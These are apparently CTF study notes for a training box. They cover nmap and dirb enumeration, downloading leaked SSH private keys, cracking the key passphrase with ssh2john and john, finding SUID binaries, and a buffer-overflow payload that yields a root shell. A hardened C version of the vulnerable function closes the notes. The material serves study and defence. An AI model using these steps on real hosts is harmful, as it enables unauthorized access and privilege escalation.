CTF study notes: leaked private key

Bilibili video: https://www.bilibili.com/video/BV1z4411K7Pt?p=3

1. Information gathering
Scan the target IP address and find the open services.
Probe each service for vulnerabilities, then send the corresponding payloads to reach the highest privilege level.
- nmap -sV <ip address>   (enumerate open services and their versions)
 
2. Analysing the scan results
Each service listens on a port; the port scan shows which ones are open.

Look closely at unusual ports, in particular high ports that serve HTTP.

3. Probing the high-port service
For an open HTTP service on a high port, browse to http://<ip address>:<port>/ and view the page source for useful information. If there is no flag, use a tool to discover hidden pages:
- dirb http://<ip address>:<port>/   (brute-force hidden files and directories on the service)

4. Analysing the hidden page
Open it directly in the browser to see what it shows.

Look for SSH information and keep browsing for further leaks such as SSH keys. (What SSH does: an SSH client on the local machine logs in to the SSH service on a remote machine, so the remote machine can be operated from here.)

Steps:
- open the .ssh directory,
- download the two private key files,
- cd Desktop/ to switch to the desktop,
- ls -alh to check the permissions,
- chmod 600 id_rsa (owner read/write only; ssh refuses a private key with looser permissions),
- ssh -i id_rsa [email protected]



5. Cracking the SSH key passphrase
Use ssh2john to convert id_rsa into a hash format that john can recognise:
- chmod 600 id_rsa
- ssh2john id_rsa > isacrack

Crack isacrack with a dictionary:
- zcat /usr/share/wordlists/rockyou.txt.gz | john --pipe --rules isacrack
(| is the pipe symbol)
Enter the recovered passphrase to log in to the host, then:
- cd /root (change into root's home directory)
- ls
- cat flag.txt (permission denied: simon is only an ordinary user)
 
Find files that run with root privileges (SUID bit set):
- find / -perm -4000 2>/dev/null
(-perm -4000 matches files with the SUID bit set;
2>/dev/null discards the error output)

cat message.c to read its source and find flag2.
Run read_message and give it the input SimonAAAAAAAAAAAAAAAAAAAA/bin/sh to escalate privileges.
- pwd
- whoami
  result: root
- cat flag.txt to read flag3
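The payload shape above (a fixed "Simon" prefix, padding, then /bin/sh) is what you get when a SUID program checks the prefix and then copies the message into a fixed-size buffer without a length check, so the bytes past the buffer land in the command string the program runs next. The following is an added example of the hardened form, not the box's real message.c: the struct layout, buffer sizes and default command are assumptions constructed for the note, and read_message_safe/command_intact are hypothetical names.

```c
#include <stdio.h>
#include <string.h>

/*
 * Hypothetical layout, constructed for this note: the user-supplied message
 * sits directly before the command string that the SUID program later runs.
 * This is not the box's actual message.c.
 */
#define MSG_LEN 20
#define CMD_LEN 32

struct message_state {
    char message[MSG_LEN];   /* user-supplied text */
    char command[CMD_LEN];   /* program executed after the message is read */
};

/* Constructed placeholder for the command the program would normally run. */
static const char DEFAULT_CMD[] = "/bin/echo";

/*
 * Hardened read_message. Returns 0 on success, -1 if the input is rejected.
 * An unbounded strcpy into message[] would let a long input overwrite
 * command[]; here the length is checked first and oversized input is refused.
 */
int read_message_safe(struct message_state *st, const char *input)
{
    memset(st->message, 0, sizeof st->message);
    memcpy(st->command, DEFAULT_CMD, sizeof DEFAULT_CMD);

    /* Same authorisation check as the original: message must start with "Simon". */
    if (strncmp(input, "Simon", 5) != 0)
        return -1;

    /* Look for the terminating NUL only inside the space we actually have.
     * If it is not there, the input does not fit and is rejected rather
     * than truncated or spilled into the neighbouring buffer. */
    const char *end = memchr(input, '\0', MSG_LEN);
    if (end == NULL)
        return -1;

    size_t n = (size_t)(end - input);
    memcpy(st->message, input, n + 1);   /* n + 1 includes the NUL */
    return 0;
}

/* Returns 1 if command[] still holds the default, i.e. nothing overflowed into it. */
int command_intact(const struct message_state *st)
{
    return strcmp(st->command, DEFAULT_CMD) == 0;
}

int main(void)
{
    struct message_state st;
    const char *inputs[] = {
        "Simon says hi",
        "SimonAAAAAAAAAAAAAAAAAAAA/bin/sh",   /* the overflow payload from the note */
        "Bob",
    };
    for (size_t i = 0; i < sizeof inputs / sizeof inputs[0]; i++) {
        int rc = read_message_safe(&st, inputs[i]);
        printf("%-36s -> rc=%d command=%s\n", inputs[i], rc, st.command);
    }
    return 0;
}
```

The point of the bounds check is that the long payload is rejected outright and command[] is never touched, so the SUID binary keeps running the program it was built to run.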


Source: www.cnblogs.com/wumingxiaozu132/p/12638432.html